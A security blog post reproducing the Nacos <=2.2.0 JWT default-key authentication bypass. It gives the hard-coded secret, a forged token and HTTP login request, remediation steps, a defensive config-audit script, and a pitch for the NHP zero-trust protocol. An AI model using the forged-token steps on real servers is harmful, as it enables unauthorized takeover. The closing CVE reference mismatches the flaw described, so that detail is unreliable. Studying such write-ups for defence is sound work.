B1ueD0g

BlueDog's Home


Enhancing Nacos Security: The Evolution from Traditional Security to the Innovative NHP Protocol

0x01 Overview

Over the past four years, through participation in offensive and defensive drills, network protection (HW) operations, and other key security tasks, the author has come to appreciate the limitations of traditional cybersecurity strategies. These practical experiences have deepened the community's understanding of cybersecurity and digital security, and have also shown how traditional security measures fall short in an ever-evolving threat landscape. In the 2023 network protection efforts in particular, the Nacos 0-day vulnerability incident drew widespread attention.

In this context, traditional security products such as firewalls and Web Application Firewalls (WAF) appear inadequate against application-layer vulnerabilities. While these products can effectively defend against certain network-level attacks, they often fail to provide sufficient protection against complex application-layer flaws such as the authentication bypass in Nacos. Additionally, the patching cycle for such vulnerabilities is often lengthy, meaning that systems remain in a high-risk state until the vulnerability is disclosed and fixed, which led to breaches during HW operations.

This article uses the Nacos vulnerability QVD-2023-6271 to examine the limitations of traditional security products against complex network threats, and introduces an emerging cybersecurity approach: the Network Resource Hyper-Invisibility Protocol (NHP). As a core component of the zero-trust security framework, NHP is designed for resource invisibility and secure access in network environments. Guided by the security philosophy of "never trust, always verify," it controls access to data resources through a rigorous authentication and authorization process. Applied to Nacos, NHP can address specific security challenges such as authentication bypass vulnerabilities while also improving the overall security and resilience of the whole system. The article discusses the application of NHP to Nacos and its advantages over traditional security products.


0x02 Vulnerability Impact Scope

Nacos is part of Alibaba's open-source Spring Cloud Alibaba project. It is a platform for dynamic configuration management, service discovery, and service management that helps developers build and manage microservice applications. It provides a centralized way to manage configuration information and can register and discover microservices so that they communicate and collaborate reliably, which makes Nacos a powerful tool for building distributed systems. At the time of writing, the GitHub repository has over 28.3k stars.

Vulnerability description: The open-source service management platform Nacos has an authentication bypass vulnerability. In the default configuration the token.secret.key is left unchanged, allowing a remote attacker to bypass authentication and access the backend, which can lead to control of the system and other consequences.

Affected Versions: Nacos <= 2.2.0

Exploitation Difficulty: Low

Vulnerability ID: NVDB-CNVDB-2023674205 QVD-2023-6271

Threat Level: Severe, capable of causing remote code execution.

Comprehensive Evaluation: The vulnerability is easy to exploit and can lead to remote code execution in external network scenarios. It has been publicly disclosed and can be exploited by hackers for widespread scanning.

0x03 Attack Principle

In Nacos <= 2.2.0, the token.secret.key has a fixed default value:

key=SecretKey012345678901234567890123456789012345678901234567890123456789

With this default key, anyone can construct a valid JWT and access the backend directly.


0x04 Reproduction Steps

IP Address      Purpose           Remarks
172.17.0.1      Target machine    Nacos started as a Docker service via the configuration below
192.168.31.31   Attacker (Kali)   Attacker machine

Environment Setup

Windows Environment Setup

This vulnerability requires a Java environment; following existing reproduction write-ups, jdk-11.0.2_windows-x64_bin.exe is used.

Nacos download link: https://github.com/alibaba/nacos/releases/tag/2.2.0

Since the vulnerability has been fixed in versions after 2.2.0, use the 2.2.0 package.

After downloading, place it in the virtual machine and execute startup.cmd -m standalone.

Once executed successfully, Nacos will start locally.

If Nacos starts without errors, the setup is complete. Access the console at:

http://192.168.31.31:8848/nacos/#/login

Linux Docker Setup for Nacos

This reproduction uses Docker. Run the following commands on the Docker host:

docker search nacos # Find suitable Nacos version
docker pull nacos/nacos-server # Download image


Set up mounts:

mkdir -p /tmp/nacos/logs/      # Create logs directory
mkdir -p /tmp/nacos/init.d/    # Directory for custom.properties

Modify the configuration file:

vim /tmp/nacos/init.d/custom.properties 
server.contextPath=/nacos
server.servlet.contextPath=/nacos
server.port=8848
spring.datasource.platform=mysql
db.num=1
# Java .properties files do not support trailing inline comments, so notes go on their own lines.
# Change the host and port to match your database
db.url.0=jdbc:mysql://127.0.0.1:3306/nacos-config?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true
# Database username
db.user=root
# Database password
db.password=123456
nacos.cmdb.dumpTaskInterval=3600
nacos.cmdb.eventTaskInterval=10
nacos.cmdb.labelTaskInterval=300
nacos.cmdb.loadDataAtStart=false
management.metrics.export.elastic.enabled=false
management.metrics.export.influx.enabled=false
server.tomcat.accesslog.enabled=true
server.tomcat.accesslog.pattern=%h %l %u %t "%r" %s %b %D %{User-Agent}i
nacos.security.ignore.urls=/,/**/*.css,/**/*.js,/**/*.html,/**/*.map,/**/*.svg,/**/*.png,/**/*.ico,/console-fe/public/**,/v1/auth/login,/v1/console/health/**,/v1/cs/**,/v1/ns/**,/v1/cmdb/**,/actuator/**,/v1/console/server/**
nacos.naming.distro.taskDispatchThreadCount=1
nacos.naming.distro.taskDispatchPeriod=200
nacos.naming.distro.batchSyncKeyCount=1000
nacos.naming.distro.initDataRatio=0.9
nacos.naming.distro.syncRetryDelay=5000
nacos.naming.data.warmup=true
nacos.naming.expireInstance=true

Start the container:

docker run --name nacos -d -p 8848:8848 -p 9848:9848 --privileged=true --restart=always -e JVM_XMS=256m -e JVM_XMX=256m -e MODE=standalone -e PREFER_HOST_MODE=hostname -v /tmp/nacos/logs:/home/nacos/logs -v /tmp/nacos/init.d/custom.properties:/home/nacos/init.d/custom.properties nacos/nacos-server

If the container is running but Nacos itself did not come up, enter the container and start it manually:

docker exec -it [container hash] /bin/bash # Enter Docker container
cd bin
sh docker-startup.sh

Access the console at http://192.168.31.31:8848/nacos; the page opens successfully.

4.2 Vulnerability Reproduction

In Nacos, the token.secret.key is fixed, located in the conf directory under application.properties.

In my environment, the key value is: SecretKey012345678901234567890123456789012345678901234567890123456789

Using this value allows for JWT construction. Access https://jwt.io/ and input the default key value.

{
  "alg": "HS256",
  "typ": "JWT"
}

{
   "sub":"nacos",
   "exp":"1704724306"
}


Here, exp is set to a timestamp in the future, i.e. later than the current time.

Note that on the website, the secret base64 encoded option needs to be checked.

Add the Authorization request header in the data packet as follows:

POST /nacos/v1/auth/users/login HTTP/1.1
Host: 192.168.31.31:8848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://139.196.217.155
Connection: close
Referer: http://139.196.217.155/nacos/
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6IjE3MDQ3MjQzMDYifQ.tjGozAqCoY1r0AKy8fnF1qORQAtF-7-dDrnBR2t2-08

username=admin&password=123456

Send the data packet and intercept the response packet to obtain the access_token.


Copy and save the whole response, then perform a normal login, intercept its response, and replace it with the saved response to complete the login.


0x05 Remediation Plan

  1. Upgrade to the latest version.

  2. Delete the following options from the default configuration so that Nacos must be configured manually at startup. This is done in the conf/application.properties file:

nacos.core.auth.server.identity.key
nacos.core.auth.server.identity.value
nacos.core.auth.plugin.nacos.token.secret.key

  3. In the same application.properties file, set nacos.core.auth.enabled=true to enable service identity recognition.

  4. Restart Nacos.

Now request the interface used earlier in the browser. A 403 response indicates that the modification took effect.

  5. Enable permission authentication for the Nacos registry and configuration center.

After completing the above modifications, re-scan for vulnerabilities; the Nacos permission bypass vulnerability (CVE-2021-29441) no longer appears.
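As a defender's check for the fixed default key discussed in 0x03 and the settings listed in the remediation steps above, here is an added audit script (not from the article or the Nacos project) that reads an application.properties file and flags the known default secret, a disabled nacos.core.auth.enabled, missing identity settings, and secrets too short for HS256. The configuration embedded at the bottom is a constructed sample; the identity values in it are placeholders.

```python
import re

# Default token.secret.key shipped with Nacos <= 2.2.0 (the value quoted in this article).
DEFAULT_SECRET = "SecretKey012345678901234567890123456789012345678901234567890123456789"
MIN_HS256_KEY_BYTES = 32  # RFC 7518 s3.2: HS256 keys must be at least the hash output size
SECRET_KEY = "nacos.core.auth.plugin.nacos.token.secret.key"
IDENTITY_KEYS = ("nacos.core.auth.server.identity.key", "nacos.core.auth.server.identity.value")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def parse_properties(text):
    """Minimal Java .properties reader: key=value lines; '#'/'!' begin comments; no inline comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props

def audit_nacos_auth(text):
    """Return findings for one application.properties; an empty list means nothing was flagged."""
    props = parse_properties(text)
    findings = []
    if props.get("nacos.core.auth.enabled", "false").lower() != "true":
        findings.append("nacos.core.auth.enabled is not true: requests are not authenticated")
    for k in IDENTITY_KEYS:
        if not props.get(k):
            findings.append(f"{k} is missing or empty")
    secret = props.get(SECRET_KEY, "")
    if not secret:
        findings.append(f"{SECRET_KEY} is missing or empty")
    elif secret == DEFAULT_SECRET:
        findings.append(f"{SECRET_KEY} is the public default: anyone can mint valid JWTs (QVD-2023-6271)")
    elif not B64_RE.match(secret):
        findings.append(f"{SECRET_KEY} is not valid base64")
    elif len(secret.rstrip("=")) * 6 // 8 < MIN_HS256_KEY_BYTES:  # base64: 6 bits per data character
        findings.append(f"{SECRET_KEY} decodes to fewer than {MIN_HS256_KEY_BYTES} bytes")
    return findings

# Constructed sample: auth disabled and the shipped default secret (identity values are placeholders).
SAMPLE_DEFAULT_CONFIG = """
nacos.core.auth.enabled=false
nacos.core.auth.server.identity.key=exampleKey
nacos.core.auth.server.identity.value=exampleValue
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
"""
```

Run audit_nacos_auth on the contents of conf/application.properties; a non-empty result lists what still needs to be fixed.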

0x06 Limitations of Traditional Security Products in Handling Nacos Vulnerabilities

In the field of cybersecurity, traditional security products, such as Alibaba Cloud Security Center (formerly Cloud Knight), while providing basic protective measures, may fall short in addressing complex and advanced security threats. Taking the Nacos vulnerability as an example, traditional security products primarily rely on passive and generic strategies, such as recommending application upgrades or modifying server configuration files. While this approach is effective for immediate defense against certain known vulnerabilities, it fundamentally does not address the potential risks of security vulnerabilities.

After discovering the Nacos authentication bypass vulnerability, Alibaba Cloud Security Center's recommended remediation strategy mainly involved application upgrades and modifications to the configuration files of native cloud server applications. While this approach can provide some level of protection, it does not offer a systematic solution to address deeper security issues. For instance, merely upgrading applications cannot completely prevent future security vulnerabilities, and directly modifying configuration files may impact the normal operation of applications. More importantly, traditional security products typically only provide effective protective measures against known threats. They often lack the ability to prevent unknown threats and cannot proactively identify and defend against undiscovered security vulnerabilities. Additionally, relying on cloud service providers for security intervention may lead customers to become dependent on their security status, neglecting their own responsibilities in security management and continuous monitoring.

Therefore, when dealing with complex vulnerabilities like the Nacos one, relying solely on traditional cloud security products may not provide sufficient protection. To genuinely raise the security level and reduce dependence on external services, more advanced and proactive measures such as the NHP (Network Resource Hyper-Invisibility) Protocol need to be explored. The following sections detail the application of the NHP Protocol to Nacos security and its advantages over traditional cloud security products.

0x07 Application of the NHP Protocol in Enhancing Nacos Security

Overview of the NHP Protocol

The Network Resource Hyper-Invisibility Protocol (NHP) is one of the core components of the zero-trust security framework, designed for resource invisibility and secure access in network environments. Guided by the zero-trust security philosophy of "never trust, always verify," the NHP Protocol controls access to data resources through a rigorous authentication and authorization process, ensuring that only authenticated and authorized legitimate requesters can access the target resources. The technical architecture of the NHP Protocol includes components such as NHP proxies, NHP servers, and NHP access control, working together to hide the true network location of data resources and provide secure authorized access.

NHP Protocol and Nacos Security

In the application scenario of Nacos, the application of the NHP Protocol can significantly enhance the system's security. In response to the authentication bypass vulnerability faced by Nacos, the NHP Protocol provides an effective defense mechanism. Through NHP, the Nacos server can achieve "invisibility" on the network, meaning that it is not visible to potential attackers or unauthorized users without verification. The door-knocking process in the NHP Protocol ensures that only authenticated requesters can discover and access the Nacos server, greatly reducing the chances of unauthorized access and potential attacks. Additionally, the NHP Protocol provides an extra layer of security for Nacos through its distributed architecture and efficient encrypted communication mechanisms, ensuring the integrity and confidentiality of data communication.

Advantages of the NHP Protocol

The application of the NHP Protocol in enhancing Nacos security brings multiple advantages. First, by hiding the network location of the Nacos service, it significantly reduces the risk of being maliciously scanned and identified. Second, the authentication and authorization mechanisms of the NHP Protocol provide stronger access control for Nacos, ensuring that only strictly authenticated users can access the service. This is particularly critical for defending against authentication vulnerabilities. Furthermore, the design of the NHP Protocol also considers performance and scalability, ensuring that enhancing security does not adversely affect the performance of the Nacos system. Finally, the application of the NHP Protocol helps improve the overall security posture of the Nacos system, making it more adaptable to today's complex and ever-changing cybersecurity environment.

Overall, applying the NHP Protocol to Nacos not only effectively addresses specific security challenges, such as authentication bypass vulnerabilities, but also enhances the overall security and resilience of the entire system on a broader level. This makes the NHP Protocol an important component in enhancing the security architecture of Nacos, providing an innovative and effective method for protecting critical data resources.
